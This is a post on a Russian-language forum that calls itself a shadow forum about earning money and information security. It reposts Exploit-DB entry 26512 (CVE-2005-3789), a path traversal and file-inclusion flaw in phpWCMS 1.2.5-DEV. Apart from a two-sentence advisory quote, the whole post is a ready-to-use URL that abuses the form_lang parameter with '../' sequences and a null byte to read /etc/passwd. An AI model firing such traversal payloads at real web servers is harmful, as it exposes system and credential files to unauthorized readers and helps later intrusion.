PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access | Gerki | Теневой Форум про Заработок и ИБ

Exploiter

Хакер

21 Дек 2022

EDB-ID: 26512

Проверка EDB

Пройдено

Автор: STEFAN LOCHBIHLER

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2005-3789

Дата публикации: 2005-11-15

Код:

source: https://www.securityfocus.com/bid/15436/info

phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to obtain sensitive information that may help with further attacks on the affected computer. 

http://www.example.com/phpwcms/login.php?form_lang=../../../../../../../../etc/passwd%00

Источник: www.exploit-db.com

Поиск

Exploit PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access

Exploiter

Похожие темы